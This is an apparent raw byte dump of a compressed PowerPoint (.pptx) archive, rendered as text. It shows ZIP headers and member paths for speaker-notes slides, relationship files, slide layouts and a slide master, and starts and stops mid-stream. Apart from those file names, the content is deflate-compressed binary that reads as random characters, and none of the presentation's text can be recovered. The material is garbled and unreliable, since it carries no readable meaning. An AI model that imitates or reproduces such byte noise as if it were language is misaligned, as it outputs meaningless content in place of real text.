te@............}..?E(    ..c...Y..,B.kfV.~.......PK..........!..q.}........+...ppt/notesSlides/_rels/notesSlide34.xml.rels...j.0.......}V..6F.^...^F...V..D6.7......(....%..C..y..7e    ....E...<..<.?...b..)2........~.dK].1$Q..b`,%."..i..c"..>...........7M..y..n.T{o .................f.r....<U.....Z_;r-.......i.S.c!9X).W:..."..f..{........PK..........!..E..........+...ppt/notesSlides/_rels/notesSlide35.xml.rels...j.0.......}v..(.N/c....{.a+.ib.K-...P.    .v.I.......{...
..-...E.%..`..........."Y....{|.}..R.x..U.D.0..Wc..4#..).I...Rc.LFw....i^LY2.[1..[(...u..z.ov....-..LQ..0<.O..e ............}..?Eb...d...Y..,B.kfV.~.......PK..........!.9.`.........+...ppt/notesSlides/_rels/notesSlide36.xml.rels...j.0.......}V...F.^...^F...V..D6.7......(....%..C..y..7e    ....E...<..<.?<..b..)2........~.dK].1$Q..b`,%."..i..c"..>...........7M..y..n.T{o .................f.r....<U.....Z_;r-./.....i.S.c!9X).W:..."..f..{........PK..........!.Z...........+...ppt/notesSlides/_rels/notesSlide26.xml.rels...j.0.......}V..(.N/.....{.c+.Y"......P.    .v.I.......{...e    ....E...<..8..v..X.v.L..$p.....4.R.d
IT....JI/..&Z.....d.y...<b.....].<c^3..0....'..:_S..7;.Cp...e!.wN...S..<R1...#...t.../.....B.f.P.....................PK..........!....w........+...ppt/notesSlides/_rels/notesSlide25.xml.rels...j.0.......}v..6F.^F..]F...V...6.:......(....%..C...2./*.R.....E.|..........F.s.d.B....n.N3J].)dV....$._.a7...S.X'C*.J.e4..'.d..y4e..~.TGo..}..t.....4...kr....8ax..*..HbA.k...{....m..?Eb..7d...Y...B.kf6........PK..........!..aj.........+...ppt/notesSlides/_rels/notesSlide24.xml.rels...j.0.......}V.C..N/.....{.a+.Yb......P.    .v.I.......{...g.1.hu.............J
.Gs.l......a..3..$.O.*%......(v..D...N...*5....O.....a^3..0....'..:_S..7;......e.P..@...
.<r1...#...t.../...H.....p.....................PK..........!.1.Sh........+...ppt/notesSlides/_rels/notesSlide17.xml.rels...j.0.......}v.C7F.^...]J...V..D6.6......(....%..C...<.o,..Yhu.
...i.p>.?..bq....-\.a.=>..89.K<...R.-."....#..u.Hu..2;...&;...4.....d@.b.C.P.a..t.........[._3..9ax..+........_K...-.."..P.....e....Y..ffV.~.......PK..........!...'.........+...ppt/notesSlides/_rels/notesSlide16.xml.rels...j.0........v.C..N/c....{.a+.Yb.K....P.    .v.I.......2O..
..-...E.%..`....y......"Y....{~..hB.K<...R"[.E..1.F..u....OeF...&......iv.,......-....:_s..7;.}p....LQ..0<.O..e ........t...X..O.....Y..t.}6................PK..........!.lW.;........+...ppt/notesSlides/_rels/notesSlide15.xml.rels...j.0.......}vR...N/c....}.c+.Y".K....P
   .v.I.......g..7...,.....S.4X8...^@.8
nJ........vG...%.cfU)..F..j...g.:e.:.S...X....t..M.<..d@.b.C.P.a..t.........[._3..9ax..+........_K.....}..?E(    ..c...Y..,B{33..w........PK..........!.............+...ppt/notesSlides/_rels/notesSlide14.xml.rels...j.0.......}vR...N/c....}.c+.Y".K....P
   .v.I.......g..7...,.....S.4X8...^@.8
nJ........vG...%.cfU)..F..j...g.:e.:.S...X....t..M.<..d@.b.C.P.a..t.........[._3..9ax..+........_K.....}..?E(    ..c...Y..,B{33..w........PK..........!.m...........+...ppt/notesSlides/_rels/notesSlide18.xml.rels...j.0.......}V.C).N/c....{.c+.Y"......P.    .v.I.......2O......Z.."v....|.._v..X.v.L..$p....'.l.K2.$.RX....WDq#.VtL.u..<.Rc.0Y.e..M.l1/..........:_S..7;.}p....L\..@...
.y.b@.{G....j..X..O.....J...Y.....5............PK..........!..Y~.b...v9..!...ppt/slideMasters/slideMaster1.xml.[[r.6.........RlR$...Sj...*w.+vj.!..8.k@..L.....d...e)..9. )R...c..X?..\.qp.....on...."..ddZ_...O.4.........7.\.$`Q...y.s......M6...=.%...H.!...)...A./x.....'h.."f..b~..v.....><..b.&f.....t6.}..._.<....#&1.|.fy.[.Ko..9.Qo7.t....Q@....{&...a.Fap.F.z...I$.+.....2.....I.....4..F.QO.@......J...";.....:.F.`SL#a1...UC!.....~.......f&b.,.3nF&v....%6.7..u......l....-.X.......U..m..>t1......K..7.jq.@....en$)..QH'.H....... .j.x.U.E........p...x!..1......1.~...eK.....j....*....u.M...=...P.,.{......L..[....F....@....6,Eh.$%%S..%.......^...!._..#.....lH..'.zY.0.e.%J....    !y.6ni.)~......H...q-.`...d..F......q.H...$.!.-.zK..')..
.....L_..a".L..q..ir..$J.!..n..DV.%.......x.fZV...B.D.<...W(@..-V.]aB....6.T    ...<.|.o..I...a!&.&Q._.25x.J.pzJ...1.m.T..K.1.4.D.Emw.De.+....).|. .L...~iB.`..l..Da^...m8....V....m.?.e..+..[,C.G......w5.s..I`D..G;t...=..X.b..."....t).b..;..v..$.....|.uh....i5.'.I., ....E..7......7y6|.Bh.7.V.[.m....&...]..Z.F>_.....
.W..h...|...6...T<..].`.....>..Ip......^o...5Lc.i.J...4f..h.D...
..q.....l........{..'.}N.0X4.u%.Mz...J..=.x.d..T.......E....L<...m-.h.S.......,
T....gum.....;..3..;c.d.q...;....N~..Y.#rd.8...B..... .._y.../...+..!....1T..P,.[~$...@.jdF..Py.Rp..tnS.Mu(..(1.G...E..A...d.eM..q....q........4.Q.\...i......,i..s?e..R...G!.R.Q.c[N..w=.1[.).&.....].RT.l.......*....U..T....*..*..\l....l.]....J...b.3..P.......j......E...8...76.3;..w....y...J6U..P...X.:].&..V..e....J4.*.F.F.HVZp.ZP6.T    (......~c..4.c...,G....H..-._.B]......../u..<.4Z.3..z.M.h.1...../j...|Ze....NNhO...b.zO.c.1.    ...w"I.`.l..3...k~^.................q...E.....y.kl.@.U...........=....@$.
..=.....+@t. >.DB...#.c&NGf.}..C.E.z......*.<k0iup.._..@..BM}.B...V..f. .
..+..n.>..a+..F.%.
..5..v._i..m...._Nk$..%..r.Qk..u..!.&8P.$u.
m..O.K....p........t...BQ.............).|.%.......6yx...'.-<<....5.=.O..
}.....%.....6.....`._.[A^.....2Ie._../M....f."..t|W...|.2.U..... .[t...3..:..(..W...%..o.n:.g...$`......Uy...#../.....=.Y...qlf........d;..^.U.........C..G.cu... .a*.\T.    ..3}X+x.....H.....Nt!s.....Q..6.....8.*..L.....,....}.......O...2..u2hf.@Q_->...T....j..B......@.L.j..^3@[X.:..]4B..z.s.e.....[.r.au...B...f"..F..i..%nY.n......%.........PK..........!.2G[.........+...ppt/notesSlides/_rels/notesSlide20.xml.rels...j.0.......}V....N/c....{.a+.ib..-...P.    .v.I.......{............F..h......J
.Gs.l......a..3..$.O.*%......(v..D...N...*5.......].<c^3..0.......:^S..7;......y.P..@...
.<r1...#..u.....i.S$...AR8otV}.Uh.p..........PK..........!.../.........+...ppt/notesSlides/_rels/notesSlide21.xml.rels...j.0.......}v....N/.....{.a+.Yb.K....P.    .v.I.......{.....)Zhu...K>............9E.p!.}.{......2.J.la../...hA.)S..!....2....G2].<..f@.a...P...u..z.ov....5..BQn.0<.O..e$.......=.j...H.."1    ...P....lV..53...?.......PK..........!.............+...ppt/notesSlides/_rels/notesSlide22.xml.rels...j.0.......}v....N/.....{.a+.Yb.K....P.    .v.I.......{.....)Zhu...K>............9E.p!.}.{......2.J.la../...hA.)S..!....2....G2].<..f@.a...P...u..z.ov....5..BQn.0<.O..e$.......=.j...H.."1    ...P....lV..53...?.......PK..........!.[8.$........+...ppt/notesSlides/_rels/notesSlide23.xml.rels...j.0.......}v....N/.....{.a+.Yb.K....P.    .v.I.......{.....)Zhu...K>............9E.p!.}.{......2.J.la../...hA.)S..!....2....G2].<..f@.a...P...u..z.ov....5..BQn.0<.O..e$.......=.j...H.."1    ...P....lV..53...?.......PK..........!..(..........+...ppt/notesSlides/_rels/notesSlide12.xml.rels...j.0.......}v....N/c....{.c+.i".K-...P.    .v.I.......{.....D.Z..B.)D.-|...^@.8
nN........v.8;.K<...R.-L".......u.Hu2..8...&;r#..i.MY3..0.!X(...:^s..7;C....yA.;'..1`..2.X....[i;]m...i.S.. 8.,..U..*..ff..........PK..........!.........7...-...ppt/slideLayouts/_rels/slideLayout12.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!.........7...-...ppt/slideLayouts/_rels/slideLayout10.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!..    .......... ...ppt/notesSlides/notesSlide10.xml.V]o.6.}...p...#.GS#N.8.P`M.:..JS..6..H..6.......v.l....!%..{..8.|.*.-....Qr..'.Z.4..Q....s...B.B....f.......r..gG..n(FI.}9.......kJ.x77...[...V<.o.z.~..W.\'k{..{3...o..
..qbY    ..]....V..[i..M..    .
..T...+.,sX.......6..[.[.S0.....Iz...cq.q...W...........C`..(..u.......l....2.x...~:p..^..6..T.}8...T.)..B,............X../F..H. o.1.._.&......e|..!.......M...K..T..X.k"m.m\...9h^60..s......c.2..#...NP.HQ.....C...AHl0...z.....y..}....S_+.s1D..0ZX......u..4.4.>V...O........XS.=/.....>..x.>.v7..U.Z...M.T...r.df.c....6.]J.J...B..&..r,+..Q..J...#.....1......!..r.R).......;..K$%..N........W.I~=+.Y.....$..`?...=........;..yt..+.F+-.Ba.
.Q..U.I,04...5.u\.ym.....t"n..27..WA.~.WH.....E...z.B..1G...#.u$].~.T@.......s....%.F.N.....    ..<f.Ge.."    P?......)..~.#...O)c.]..t..................s..L)...B.....(.....Kz....A..
...iHz.....[..]t.d...9......t...5..>...*...O..,Jz'.........Ng,_...VW.......v[^N...@.....s..Qa..m.&..(7QG.Ee...|...fp.?..9.....:..7....d..On.g..oo......H..@#....W0.d..9.?e.W..g...!..~rb...3,.o5...Q~\.    .OP.5..J...G..`..cw........PK..........!.................ppt/notesSlides/notesSlide9.xml.U.n.1.}....N.,    !.,QJ.*RKPH>`.5....6.R..;.Y..k....=g..3cNNWR.%......{]J.b.j....7...%...@h.K.....?~81...;....P..{Sd.c5.....
.f.J.......O.."...~&.Qt.o...g...s...+.@,...vW7..h.=h.r.01......ME........Z~.fj&6....K.
..D.Dah.9.\.?.^.E..>o..X....@.....(.:|b..|.    K..a..W..e..gngm..`.4.J....[:S.T.\J.s2..x.E.-...L..`_5.....<    .....F5.9?s.....`.e.;H..15.k.B:Q].yH.e..q..8. .&./...d..S......v.w.ZS...(..j....O........Yy..z......p~....>.h..1.b.    ...\un..T...;..~$8..o...oU.<v9N....c...1w...q..Q.^|..8f..I..X..c...j...w3lA.c.......-[.Z[S..............!B..w_........(.?..m|..LT...u......~....;....38....."?.\...u{..vFp:.V...O. ML0...#..._p..o.E.Y.e.R2a...Z...?..k...>...>\    ............PK..........!.~jF.{....    ......ppt/notesSlides/notesSlide8.xml.V.n.8.}_`.a.g.j.V!v.u6..m..-.<........cw.@.?....tHYI.8..}.i.sf.\.}.jU*X.u..q..7H..0...8....{....3TF.8Y.K^M....J......Kq...Wi..DA%...H.....=..y?.x........~.R'.{..{.XHA.F.%i..XR.9vW...h.s.*K.a..VH..&f*....`..J/_.jV].x|... 3.X..KNL...l........<o.0]-l99....j.p.....0....l..]Q..qW....o.p..N....}:...L.......R.....,.....#..1._..0.&!......@....H..&..b...)
.T..u..t*;/..&.-..Ek....aC.a2...E...4.O.x:....    w..(...x....b.P.`.x!..-Ojo.......3.V...r.0....OqN.    ...Y...>v...O.!......\+.    r.r......f.......~.x...u..G.@..................T.).(...;.......?.~sl.S.f...cx...F......T
.b..O..-_...;f...H..O....6.CUy..,+.k..R........E......@.....B..k6.Sn5FS.ic1:.D..\6...j.d
?.~....&..............Dm%....\.{.&rr..*.(@:.5s....z[Q.....-.....]......p;..|Ja.Z.i....V.[z9..B.....5_....g.l.;q.Qx.........'....h.?=<.........a.ho:...g......'.....\.C.9...r.#....stS#......#..%j^h^...P.-V..Q.....k..*n...Wo.....a........PK..........!.<.9=....R.......ppt/notesSlides/notesSlide7.xml.U[n.0../.;..w....
...I...c...h...R.J....z.^.'......$..#Q$gwgwvur.,%..c..zt.M.P\...z....uL.uL.Lj%zt%,=..}sR%J;a    ..&.Gs..$.,.E.......T..9|.,J[.n)....F%+.]..k.z:-.8.|V
.j#FH......6...X...0...B.......muk..+5.`.q52.x8..R...%..H.....k.S.....x.Xb.rj..    K..,{.._.'@,.KGx...wy~..../v.....`.....m...:cY..\.,.d$.....0d...3.....K...:!.F..j.3..3[    ...l.....S...r.V..iezUf.MH.?..`Q.....w2...0(.!..e./G:...B.(QH...V.[......=/..2....i....G...[I.}..`,    ...I..G.j..)I...:.-.@
.>^...ou.V...db....    ..:~.YG.B{..x...?O]L......}>..,...4=.F[.J..r..r.5.4).2....gD.(>...A\...E......x....F.2.-.dj......y.A......p.|.......lo..(..6./....i.t.Y9A......rEc.4.....:c.uh..........T.a0~?.;...Q.u......y.:>.....2><.|w~........Q.n....].........G....a7OD\....].P.z.c..~..'V].C_...t.V......W.....?.......PK..........!...K.............ppt/notesSlides/notesSlide6.xml.Y.n.7.}/. .9.X..."..\...G.....r...$Kre.E..F._.C.V.....n.....%...g...o.-
I..:.. .kw.....P.A....u....J.....%w....zk.J{...+...$...;..r^P...+.e......:...8...^.{.).P.j.}.~.e..S...+_.b.....\.W.f.r......{K....&2.;si9.#5.`...m\...-.),..E..&...Vd.S........$._d.8yK...,.    .....D.|.    .&.f.....e./.Pwj..`.4hUi..:.Z...)'..:.d,)...).do.g....s...Q..W.._._.F9U3>t..8UY.].k..DA....40....b..D...8.78.A.X...2..2..So.....nI.:]&..\Q4....._...p.ac..".l1,.....n/I.'~)9.i.....\A.yt.....P).8...!.eBR.]...f...;8........s..^.q....-S.xBB$..r.9...T...I.A..aa...3O....u..xc...yv.v..)..P.3..>.t..i9..r.M2-'7...TY\.."...s..K.....o...T....J(:H.j}.......Ra}.:.
?.......'...0...IN..s-.<%...q...-c.b.PI..s .#.9.<\3t.o%A..A1..H..w.L.6;.Q.........Q..;..k.|3.....}.H.C. ..<....(...]...I..m...^.r0.H.H?.x'.o^.......<...7t..VA...C...U...R....[x..j....D....x....%.`..nBW.HLH^...s2...a.&Cp.....Z..J .....5..-B.M.%.mb8D....W.........../8..8.U:.....@.........y*.C..#...p...F.W$.eH..5m.Tj........b.4..y...L.t.=.R1s..C.&...........C    f.cV. .....#p...%.J.:_n....G.y..^<....!..^.H.kG...u.w..5..)...1..7<......s.g$.0x.kE...?..]y...Pd<....._V.....*.O4..\..e(._..3."..V.T.1.n......O.@.....x7....n>.PD".1...............8..v7$m.....h,tD.........k..{...X.[.r.].(.J.. .    GX....=.H\..xD...i{.A..d?0...V..0...;..U...,.........C..GW-..J$Ln.v`..
m........_.S}...d.;.....w.G..Z.G.....i.u|0...........aw..d.EEQ. ............h....v?.. n.2..M...q.a.Kg.~...<v.........A..N...._...'........PK..........!..[..b...........ppt/notesSlides/notesSlide5.xml.T[o.0.~...`..&...P.0.J.E....c.h..6.:....!..........9>....h.......Y...T..,3|w;..1....p%Y.w.....7#.J..E./mJ2\9..(..b..3....J.A.|.2*...y...8.D......k..jUS6Ut-.tM..8q...jm.l.5..a...._Z..6.......0.%..h.R/L0.7......H....ho...O    n DO..6.I.+#.#..6..0.....DR.u.6J...........w.....E=...s8I.g....+AJ...PV)^0...8.`..>).."..yC..Qn/...%.X.hP5l.....)...
..."-/.D.....5.m...4.....t[0....0..0Nwz....-...Z...N..=....@....2b.vjU;_....[..g.')...A..b....V3.d.n..
.P....)vz-;...kq..=&..?H.qBj8"....&.1.r.../I.l<.f....._$..._.:.A7.....3..I'.gI8{7......j.......'."+\............~T...*..l.....b{p(7.......;
t.A..r.W.....w{........PK..........!....a........ ...ppt/notesSlides/notesSlide11.xml.X.N#9.}_i...gBn.0.....B......nw.._zmwHf.....tB...E.......*..|..u.e.$.q.......J...dBO......qB..:..h.O..%_...vR......k...d.}.k6..rE..)..Zn....v..,}.\%..V.............`...Rq.+!.K.qv7.....o.VX. &ro.i...Xf..+.-.a.g.b\.l\...,..,..M...4..K...A.A.    ...D{....    .A72.'0.".......VM..,..>C..<C..7.    V...*.~V.S.3."..R.    '#I....qK.+=+f
aW.}sD.h^.......TO..+8.S.5....;.(.....(`H'.K5    .D...8...|P-Vj..L.V.&...jt^W....&[$..pQ4....=??.Cpl`.zQ`.....\....%.../$.<..a...S.^.k..]......!...X&$..=M.......A...z.I8..g.[..F....R........s.....u.$.A.q....l.<.Q.m.....M.3.?..>"..5.i...."A.\M.....h..._/......*.x.^.`X..E..{......F.RLC....n|.#.......H...>2a}.!q..%..t}..;A..E........D{~p?..(...z..SZ...+..j...wo.-2.r..;.$_S7-.......|RX...*..\.f.3.'wHj...>......d{...*...............R,.UJ/......Jr;..8=l....h....L....8.Q.:b.%Hi..
h5..<....(l    jo..R..,.....[.W....Q.y..U]R...bw.}..{....{.. p.......6 .....{...Lx..........m.....].Y    .Z:"..9.W..*._D..pLl.BD0..v...A.WA.........hG.... .{.6.......6^..    ...2..O...H.N$.K.1..

p..w......O.....T.....-'+.{r.m..6.J...:.a.....[^.n.O.W......b..(....:..@U7..T)...>P.#.@.XAt.8....s[....$..^.c....?._.s.'.Y.8...........G.N.....8>.v...E......i..O....T..=...le..E.9...k.a.-.-..>.:...MU&.5-ng1..W.{.....)2H...._..<........PK..........!.{........    .. ...ppt/notesSlides/notesSlide12.xml.V]n.6.~/.;......dS#..u.b.6    ....Sc..E.$e[-
.4{.=I..e....}..D9..|...M.`E.K.G..q/....R/G..O....|@..2.FYM>{?...K;.&....~.......]/
*...K........-...5.-U....wK.:.......B
.2.*I...#..c.....f.b.:.l&i..4...L....'G.Wz...3{.........b.h,.0Yw..=.>5..E...ek    ...+..8..`3...u|...i.@4B...............G.s..j2z.N.Mg.dN...%..BA.Q998...(#....{..p.MA.G...i.zI.oI$QSq.j}...hl...\H....2.Ie..i.*x.A....|2.6.....i._O..H.&.3F..(...x.0l~d......B.!WN.`.2D.....P+b9..a8L........t..,.\......SE.s..P.O..jP....&^.......BA0c..qr)5X...c.!...K..u:GOJFB`....H..0D.e..T.q.(.P)..,9......).s
k".{:...uf.pt...@.p.0..7....T...S.s...H.......wr....[KOG....R.+.`..{~;...t..'Q9........*.....K.:....;t........Hx{Sn+.K.*5....../..(o..l5...x.1..5~..9.....]..f................8..r.....1jmQ...$|.........Q.R.X[.P.m..|...y..f.g ......>.--..5.;m.......3w?$..A.L.l..~.e.U........CBLL....<.....].;..;.........~..t...........&......a........*.K%2.I?..:.?.....z..:.........v.....^.$...h........k.7.......PK..........!..."
c....... ...ppt/notesSlides/notesSlide13.xml.T.n.0....w.|O...,"T..Ti.....:......A.....B......89..w...b'8.2ck%s.=.1b.........;C..#. \I..=..b...HgR9f..K...W..,.,.. .Li&.V*#..O..
C.A^..$... ...x..xU.5e3E7.I.$1.........._.M.f!M....1`.+^..o.c^...F.....b.4...1.$.@.....[....B.$|.f"..4b<".`C....{..A$c;.h...ZZ]..K../xGm...X..j.=...pV.....d.....*..fP...    &...._,.
.7..k...."r.&V3.T.t.mk{.|7.Bn..H..K..e.m...6....c...`..."l.c..i..;.S.......-.Wgn....`}..E..1.8U...{l.....3...... .%1..V...9f.s.
L........;...f......>&)..$.8!5........i9.k....6.SS."<...I.....N.&..`.t..i.....?...M...>..,...<..    ..
7...Y<..f.H........A..N.Qs^@l/...3.W...pH..iPi8...|p.............PK..........!..5[.c....... ...ppt/notesSlides/notesSlide19.xml.T.n.1.}....N..K..%..T.Z.B....{Q}.m(...w..%4IKZ..f.~..gr...m....)..u1b....E....:c..#2#\I..=..r...D'R9f..K......$.,-. .Li&..+#..OSD.!_!..Q..."A*..x..x...e.E7.IW'1.........._.M.f!M....)`.k.....c^...F.....r.2...1.$.@...C..>%...=    /.L$..FL'$.lh.b..!.$l.....QK...|i.....-....zT5..p....W.C.....8..T<c...8.`..>*.."..yM..U...%...Y.hP.l.....)......."-..E.....5.m..........[0....0..0Nw...=.-...Z...N.......@....2b.q*...wl.....3...... ..1..V...)f.s..L........;...z...x.......$.8!5..o)..!.1.r.../I.l<.&.Yx....~w8?.u..~....qg<.....*......n..>..,...<..    ..
7...Yl.c.x$q..........6.0.....^...'.o.a=..._...p:..|t.............PK..........!.1..Lu....... ...ppt/notesSlides/notesSlide18.xml.W.n.7.}/. .o.u.|.+X.\.n....;.0.R.E.........@.s..............K...>..o..d3al.. .mw.&..i......y.(a..JIj%..R........}.......i.d...N..L.d...
g.m
r.4.Njh........NA.Jj~..~=..\.i^.B.(..I...,/m#.|.....1.{C..../e..mye..+5......    ....ay
.%LQ..$...&..
dXt>a.6...........-.    ....`..X8..&_.....Z......\.V.z..Ew..5.\.<..mAS..$q.i.
.vWvFf.._4..2.ayt.~.]..f.........>.5w{.ym...e    GZ..-....6...E..a4.~c..cF!So..{...5..t. .......-.n...|`=...PC.8......w.HZw..R`.......A.I.t....p..1Y!s_.H.47..
...JA(.:...w.*.`...=gz......`.e.L(......3.u"eN3.\X..x,+..V......h.cT+.B......j..lQmC.g:J.4......g.\.e?G.....GW.^moH...P...z....!....\.&.T.R..9R...    i....`.@..Q$..&/..R.......G..#.j.urm..k..../.....|@]...\(2..    .....t%..3S)F..K.g....\qt..2G+..r........0..i-n'd.'X.Z...9.....V    ........Zu+.r....H3..aF..0.[g(..!.Q.C.v:E..R.........@.|Q...E#...1:..M7.W.*.i.....?.li.........Sf.=......9cL7.H.;...>a+.5..../.E.^m...Z".*.f...gJ.6.R.0).,b.X.r.....O....#.....G.E...f..h....U.t...'w......R.V...=.l`...a....o.e.........s.%.&.0D..|.$.Wd0]...@.3.g@.wa....?e.x....._.....z....^.h.ku........N.{&+..I..]@....;..A....Gk..j.~O.ED.@y78!F.i.e.Z...J..Y.;x.._..U._xi ]..+<aO........PK..........!.>.......... ...ppt/notesSlides/notesSlide17.xml.W.n.8.}_`..P.>..c..J.".l...4.S.yL.%"..%)..b....^..C.J...$m.E_$...g.\xt.j^J6C..V.d{..0T\gB.....i. a...@j..d..y5...#.*..1.W..ARxo.N...Kp[......%x..y'.pEzK..u.{...J...1.z:..O4.JT.VbQ.'.]!.k...h3.....+&.7>.Yx;sa..H.^[36.6....-..!.0.%..t...m.S.6.t....&H.S[.. %..|.....$!Hq...'..,/.m...?6..4.......j....5......)!Gv..c.e..m_.Y..).S.K..&.k@.{...Q.*.cg....~6k....kL.....Nfo.<..a..q..8.A.X.q.3.........=....Nt.H(.(D......~.;    ......P....z*|8...t~...i.R
..Q.R.I.t..j.'l.....I..    .c.0W..D..^f...`..TLlq]2......1..p..f
d.Y!.Zy*..L........d.5...7..b..q@K...t..../.~v...^F.EW..m.P.C..5[..wLO7...0....3P....x..0.1...    ....3...,})...V..2...CN8......E.w..i....,~.a..&.m.........#....K.V]E-B4.P......WL...v...$@.......~VT}..Z.cDD...ZlR.......2x....M.LS...B...+.2..rx...e....B].....8*.B.|...j)..}....D....W.......'g..b...-....gL..../.x9.....^Pu...hh.."<;....YUN....=...=..H5]...._.X...A.k<..E...v.2.....^..;..k...{....^.`g.kwG......N....k.H.U.u.0.mVk.u.%......?::.....8..'...c.a....}...,.=.7".Fq.P..m..f.}Q.A7.
......PK..........!.#h.I....... ...ppt/notesSlides/notesSlide16.xml.W_o.6....@h@.....7Ub......4.S..L.%"....cw......O.#e%q.4..b..D...........R.9Z'..&.;....:.*.&..N..    s.T.R+.&Kt....?..Ti....r)...{.v:..X........-....;..+.[.N...tJ.*Y......Lp<..*Q.Z.E    .lw.0..f...Xt.&J..4"..Df....E.#5c.....|6?.Ld.X....L.Y-...OE.h..#.7. ].l9:..|c.aB./... ..g...7..x.e//~.....@.\....=.t...3."C...........Z.{.g-...w./.S.<....._.......A..j4...9;@..1..KC@:..-.pL.-..A#.(..b......g.b..v.....[:..2.,..EX.j.I..W...../....q..L.p..%.../%.<..0H.......0A..0I...J.j..'...Ta..c.@E..&?..},P1..u..c.V.c..f.9:.).Me..k..8X0.G.B.Vv<.1.T6..j...O..-....-xD >......[.2.,...h........*/.cz......P....Z.L...8.i....L..5..9..d..........?d.r.    ..D../....MC...`....5    o+....`.P\...^...*j..Y.rU@ e..f....k..%....,..o.gM......>FD...........B.....A..d.4ej8+..\...C.)....Z&.hH!.e..Pk...+t.'*...R_.w....G$/*Jz...(J.{rVj/..J..._=|.D}......c|<M...UW.Q..6..!........U..(.m....C..T...i..Y..h......yP$8.lg&....z..w../...A........{.^.;>.....:9...N..#.VE.E.t.Ym\.5...gwpStt..'..q..N.Q..@..'.K...w.........)C......-.E}...........PK..........!...L%G...... ...ppt/notesSlides/notesSlide15.xml.W.n.7.}/..l.<Y.........6@....<S\JK.K.$%K-..7..?./.!W+K.d.M....Kr.<g.........p^.........&.z..>^.6.2....).E/.    ..>...C..&.O....zY....Z...d.i..X..W..O7j..].o.Z.v{.U2....{....%.'..K.C..    .....i}..>..u..M.^..........^:!.HO~q.....|69w$s0..f%..Z...........Q..u.CW..........Y.....i ^M..Y^._...?........FT...p:5..%sAoJ6.t....Q.p...Y.38{k.o..........._0=...
..*6...>;R.oc.
3.".....xL.-..Am...j.....N.,e.2...0.......Y..%Z......O0........\y<.f(C<oyI.p.fJ`.u.0.M.....i/....".\....|..J0.x.@....P.<z...#y..h..P2..Y..W*..P2.....$@...........3W.ee...q.3.1..(....
.Ph d.b.aJ.5p.....ZQ6D..B..8'.....".....l..V
....y..&...i..`.../X.B.@.....B8.\!    .%.....9s..cl....>....S...n.Qu.@..@..1.....n.......ct..Vn.).7.!..    T.5......5...E.z3v`u.V\..F.=.N.$.1..1.T#C.......>t.D...d...    ..5...X.......\"7.7...%p-U    B?.h...vE.$.....".D
..X+..P.....}1
.PCF>y..........0.rGn.Q.*.Y'5...m...jc.jT%...E^......r
.G..)%....(].t,"...3i.....f..I.+....P...].....-..k...4v.N.j.......r...-...Fp...G/.}.\...?.../...Y.o3.*O.../;;........N....i...;.v...wp...q{.s.h....A.....*k....d{.6H8:.o....I1.Zu....+............OS.j....vKd/6.G........PK..........!.........7...-...ppt/slideLayouts/_rels/slideLayout11.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!.....b...........ppt/notesSlides/notesSlide4.xml.T[o.0.~...`..&...P.0.J.E....c.h..6.:....!..........9>....h.......Y...T..,3|w;..1....p%Y.w.....7#.J..E./mJ2\9..(..b..3....J.A.|.2*...y...8.D......k..jUS6Ut-.tM..8q...jm.l.5..a...._Z..6.......0.%..h.R/L0.7......H....ho...O    n DO..6.I.+#.#..6..0.....DR.u.6J...........w.....E=...s8I.g....+AJ...PV)^0...8.`..>).."..yC..Qn/...%.X.hP5l.....)...
..."-/.D.....5.m...4.....t[0....0..0Nwz....-...Z...N..=....@....2b.vjU;_....[..g.')...A..b....V3.d.n..
.P....)vz-;...kq..=&..?H.qBj8"....&.1.r.../I.l<.f....._$..._.:.A7.....3..I'.gI8{7......j.......'."+\...........{~T...*..l.....b{p(7.......;
t.A..r.W.....w{........PK..........!..GJ.b...........ppt/notesSlides/notesSlide3.xml.T.n.0....w.|O.&@YD.....FQi..uL....N{..;.......89..w...r+8.0ck%s|~.c.$UE-.....:...#. \I.....r...PgR9f..K...W..,.,.. .Li&..RF.....
C.A^..$... ...x..x.Z..M.].&]..0N..n.Z.6.~M6m..4!...F...y....5.yIn>.............0.D.18...n.S........D......d.ms..../...m....>jiu../.>.......CQ..A..N..Y..`.J....'.U.......&.@.O.~.H*@...n..K......f4..6.|.....nt..N....W..e.m...6....c...`...<l.1..4.....b.a.`D..?..3.}..~.>.."......Z...;6q..n...I...}....r......3..[.....ok.x..n.N3..Z..|.IJ..I0NHG.!._..8fZ....%i.....x.....$.{..~..O.N.?M:..$...Y....M.q...V.\Bw.]..Vd..pF.,..c.x$s......A..M.Qs]@l....3.....pG..IPi....|t.............PK..........!.....b...........ppt/notesSlides/notesSlide2.xml.T[o.0.~...`.=M..e..b0.J.E....c.h..6.:....!..........9>....h.......Y...T..,s|w;...YGdA..,.;f........r."..6#9...Y.[Z1A...L.m.. .>M...|....i..cAj....5.j..).*..L.&.a.8..V..m6..l.0.iB./-...]...[}k....|4z..&....Au..a$..bp.7.....7..'.e..d....!........._."..:D.%}....._Z}x.;n.@....U..9.....u... %C.N(../.A...M0.d...b.T..!D.(..&..%.[.hP5l.....)...
..."-/.D.....5.m...4.....tZ0....0..0Nwz....-...Z......=....@....2b.vjU;_....[..g.'....A..b....Vs.dt..L........;...f...........$.8!5....]...i9.k....6.S..Ex../.N..\..^..F..4...I.%.Y....M.I..>..,...<..    ..
7...Y...f.H.F........6.0.........g..7a;...]...p9.+......=.    ......PK..........!..K.X....R...!...ppt/slideLayouts/slideLayout6.xml...n.0...G..,.w......N...g..n.p8N..q..f.i....'...........4....~.|.do].Rs..RNi.v...Y..r9.W.G..%..L@..Oi.5...~5.b-.ch..!.C...43...@........8......j.$
n0v!....0( ...W../.4g..d..K..Q\....,...V='Z...0...-..B.&7..I.P.LU..!..z..    .P....".....Rqn.d.AU..\9...\.<..:G.t.....h./.#.....:U.l.1. .)..5..N...!..d..,;.b...-.._.wp..U.*....rZ.........d....uZ..<vZ.`V._e.'..];.xx{.L.,../..
